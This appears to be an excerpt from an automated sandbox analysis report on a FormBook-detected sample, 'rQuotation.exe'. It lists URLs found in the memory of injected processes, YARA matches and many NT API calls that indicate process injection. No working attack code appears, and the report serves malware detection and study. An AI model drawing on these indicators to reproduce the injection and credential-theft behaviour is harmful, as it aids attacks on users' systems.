              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.theanchorage.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.thetrees.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.uniquewood.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.unisoc.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.vetcbd.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wildboys.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuhaozhibo.com
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.wuyezhibo.com
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xgvppgfswog.com/
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiangcaozhibo.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiangxiangzhibo.com
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiangxiangzhibo.com/binding
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiaocangzhibo.com/binding
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xingmengzhibo.com
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xinxingzhibo.cc/kcud/48.html
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xishizhibo.com
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiuyezhibo.com
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiyezhibo.com/binding
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xiyezhibo.net
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xmxj007.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xwhy.com.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yaoyaozhibo.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yechunzhibo.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yingyuezhibo.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yingzhuzhibo.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yinrenzhi.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.youtaozhibo.net
              Source: gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.youtuzhibo.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yudiezhibo.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueaizhibo.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yueliangzhibo.com
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yujiezhibo.com
              Source: gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yundingzhibo.com
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.yunmengzhibo.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zixiuzhibo.net
              Source: NETSTAT.EXE, 00000005.00000003.2205461163.0000000007DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://beian.miit.gov.cn/#/Integrated/index
              Source: NETSTAT.EXE, 00000005.00000003.2205461163.0000000007DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: NETSTAT.EXE, 00000005.00000003.2205461163.0000000007DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: NETSTAT.EXE, 00000005.00000003.2205461163.0000000007DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: NETSTAT.EXE, 00000005.00000003.2205461163.0000000007DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: NETSTAT.EXE, 00000005.00000003.2205461163.0000000007DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: NETSTAT.EXE, 00000005.00000003.2205461163.0000000007DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.ucdl.pp.uc.cn/upload_files/wdj_web/public/img/favicon.ico
              Source: NETSTAT.EXE, 00000005.00000002.3572452418.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: NETSTAT.EXE, 00000005.00000002.3572452418.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: NETSTAT.EXE, 00000005.00000002.3572452418.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: NETSTAT.EXE, 00000005.00000002.3572452418.0000000002DF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: NETSTAT.EXE, 00000005.00000002.3572452418.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: NETSTAT.EXE, 00000005.00000002.3572452418.0000000002DF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: NETSTAT.EXE, 00000005.00000003.2197944969.0000000007D6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://push.zhanzhang.baidu.com/push.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ucan.25pp.com/Wandoujia_wandoujia_qrbinded.apk
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://white.anva.org.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.12377.cn/
              Source: NETSTAT.EXE, 00000005.00000003.2205461163.0000000007DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.00000000044BE000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003C5E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: NETSTAT.EXE, 00000005.00000003.2205461163.0000000007DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zzlz.gsxt.gov.cn/

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.rQuotation.exe.840000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2022208730.0000000001520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3572173092.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.3574569506.00000000054D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3572399532.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3572338314.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3573072552.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2022713393.0000000001AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: rQuotation.exe
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0086CC93 NtClose,0_2_0086CC93
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702B60 NtClose,LdrInitializeThunk,0_2_01702B60
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01702DF0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01702C70
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017035C0 NtCreateMutant,LdrInitializeThunk,0_2_017035C0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01704340 NtSetContextThread,0_2_01704340
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01704650 NtSuspendThread,0_2_01704650
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702BF0 NtAllocateVirtualMemory,0_2_01702BF0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702BE0 NtQueryValueKey,0_2_01702BE0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702BA0 NtEnumerateValueKey,0_2_01702BA0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702B80 NtQueryInformationFile,0_2_01702B80
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702AF0 NtWriteFile,0_2_01702AF0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702AD0 NtReadFile,0_2_01702AD0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702AB0 NtWaitForSingleObject,0_2_01702AB0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702D30 NtUnmapViewOfSection,0_2_01702D30
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702D10 NtMapViewOfSection,0_2_01702D10
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702D00 NtSetInformationFile,0_2_01702D00
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702DD0 NtDelayExecution,0_2_01702DD0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702DB0 NtEnumerateKey,0_2_01702DB0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702C60 NtCreateKey,0_2_01702C60
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702C00 NtQueryInformationProcess,0_2_01702C00
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702CF0 NtOpenProcess,0_2_01702CF0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702CC0 NtQueryVirtualMemory,0_2_01702CC0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702CA0 NtQueryInformationToken,0_2_01702CA0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702F60 NtCreateProcessEx,0_2_01702F60
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702F30 NtCreateSection,0_2_01702F30
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702FE0 NtCreateFile,0_2_01702FE0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702FB0 NtResumeThread,0_2_01702FB0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702FA0 NtQuerySection,0_2_01702FA0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702F90 NtProtectVirtualMemory,0_2_01702F90
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702E30 NtWriteVirtualMemory,0_2_01702E30
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702EE0 NtQueueApcThread,0_2_01702EE0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702EA0 NtAdjustPrivilegesToken,0_2_01702EA0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01702E80 NtReadVirtualMemory,0_2_01702E80
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01703010 NtOpenDirectoryObject,0_2_01703010
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01703090 NtSetValueKey,0_2_01703090
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017039B0 NtGetContextThread,0_2_017039B0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01703D70 NtOpenThread,0_2_01703D70
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01703D10 NtOpenProcessToken,0_2_01703D10
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03344340 NtSetContextThread,LdrInitializeThunk,5_2_03344340
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03344650 NtSuspendThread,LdrInitializeThunk,5_2_03344650
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342B60 NtClose,LdrInitializeThunk,5_2_03342B60
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_03342BA0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03342BF0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03342BE0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342AF0 NtWriteFile,LdrInitializeThunk,5_2_03342AF0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342AD0 NtReadFile,LdrInitializeThunk,5_2_03342AD0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342F30 NtCreateSection,LdrInitializeThunk,5_2_03342F30
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342FB0 NtResumeThread,LdrInitializeThunk,5_2_03342FB0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342FE0 NtCreateFile,LdrInitializeThunk,5_2_03342FE0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_03342E80
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342EE0 NtQueueApcThread,LdrInitializeThunk,5_2_03342EE0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_03342D30
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03342D10
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03342DF0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342DD0 NtDelayExecution,LdrInitializeThunk,5_2_03342DD0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03342C70
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342C60 NtCreateKey,LdrInitializeThunk,5_2_03342C60
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03342CA0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033435C0 NtCreateMutant,LdrInitializeThunk,5_2_033435C0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033439B0 NtGetContextThread,LdrInitializeThunk,5_2_033439B0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342B80 NtQueryInformationFile,5_2_03342B80
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342AB0 NtWaitForSingleObject,5_2_03342AB0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342F60 NtCreateProcessEx,5_2_03342F60
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342FA0 NtQuerySection,5_2_03342FA0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342F90 NtProtectVirtualMemory,5_2_03342F90
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342E30 NtWriteVirtualMemory,5_2_03342E30
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342EA0 NtAdjustPrivilegesToken,5_2_03342EA0
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342D00 NtSetInformationFile,5_2_03342D00
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_03342DB0 NtEnumerateKey,5_2_03342DB0
